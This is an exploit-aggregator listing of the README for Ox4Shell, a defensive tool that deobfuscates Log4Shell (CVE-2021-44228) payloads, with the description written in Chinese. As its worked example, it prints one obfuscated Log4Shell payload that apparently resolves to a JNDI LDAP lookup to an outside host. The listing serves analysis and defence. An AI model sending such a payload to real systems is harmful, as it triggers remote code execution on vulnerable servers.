Sploitus

Exploit for Ox4Shell

kitploit · 2026-08-28

Exploit Code

MARKDOWN23 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-OX-EYE-OX4SHELL
![Logo-Light](https://assets.kitploit.com/production/public/readmes/5578/fa6e744593f4ef2da234eb2dc1eb21470701cf8885c1c0681d372ea6fb941b7a.png)![Logo-Dark](https://assets.kitploit.com/production/public/readmes/5578/fc147e281f063832328e004e9ec3f075a6dda4e26fccb5b26b19f521fcad1baa.png)

* * *

![maintained-oxeye](https://img.shields.io/badge/maintained%20by-oxeye.io-blueviolet) ![python-3.8](https://img.shields.io/badge/python-3.8-green) ![version-1.1](https://img.shields.io/badge/version-1.1-blue) ![license-mit](https://img.shields.io/badge/license-MIT-lightgrey) ![blackhat-arsenal](https://raw.githubusercontent.com/toolswatch/badges/master/arsenal/usa/2022.svg)

# Ox4Shell

轻松去混淆Log4Shell有效载荷。

## 描述

自Log4Shell漏洞(CVE-2021-44228)发布以来,许多工具被创建用于混淆Log4Shell有效载荷,使得安全工程师的生活如同噩梦。

本工具旨在揭示被混淆的Log4Shell有效载荷的真实内容。

例如,考虑以下混淆的有效载荷:

root@kitploit:~
    
    
    ${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:some-email@example.com@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}